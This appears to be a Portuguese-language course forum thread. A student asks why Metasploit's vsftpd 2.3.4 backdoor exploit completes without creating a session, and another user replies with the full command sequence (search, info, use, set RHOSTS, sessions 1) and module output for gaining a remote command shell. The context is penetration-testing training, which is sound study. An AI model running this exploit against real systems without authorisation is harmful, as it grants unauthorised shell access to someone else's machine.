fiz os passos da video aula, o metasploit inicia toda configuração mas não abre a porta, como resolver isso ???
Exploit completed, but no session was created.
fiz os passos da video aula, o metasploit inicia toda configuração mas não abre a porta, como resolver isso ???
Exploit completed, but no session was created.
Boa tarde galera, para quem estiver passando por isso eu achei a solução. Algumas vezes a sessão abre automaticamente, outras não irá abrir mas vai deixar um aviso de qual sessão foi aberta para você usar.
o comando abaixo vai procurar pelo exploit desejado
search vsftp
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
o comando abaixo vai trazer informações sobre o exploit
info exploit/unix/ftp/vsftpd_234_backdoor
Name: VSFTPD v2.3.4 Backdoor Command Execution
Module: exploit/unix/ftp/vsftpd_234_backdoor
Platform: Unix
Arch: cmd
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2011-07-03
Provided by:
hdm <x@hdm.io>
MC <mc@metasploit.com>
Available targets:
Id Name
-- ----
0 Automatic
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 21 yes The target port (TCP)
Payload information:
Space: 2000
Avoid: 0 characters
Description:
This module exploits a malicious backdoor that was added to the
VSFTPD download archive. This backdoor was introduced into the
vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011
according to the most recent information available. This backdoor
was removed on July 3rd 2011.
References:
OSVDB (73573)
http://pastebin.com/AetT9sS5
http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.htmlo comando abaixo vai fazer utilizarmos o exploit
use exploit/unix/ftp/vsftpd_234_backdoor o comando abaixo mostra as opções que deveremos configurar no caso RHOSTS
show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 21 yes The target port (TCP)
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Automatic
o comando abaixo configuramos o RHOSTS
set RHOSTS "oipdoalvo"caso o sua sessão não inicie com o terminal automaticamente lhe informando isso através da mensagem abaixo
Exploit completed, but no session was created.Fique atento pois logo abaixo ele especifica que sessão você deve abrir
Command shell session 1 opened
Para abrir a sessão usamos o seguinte comando
sessions 1
ps: no meu caso a número 1 estava disponível como aviso no terminal.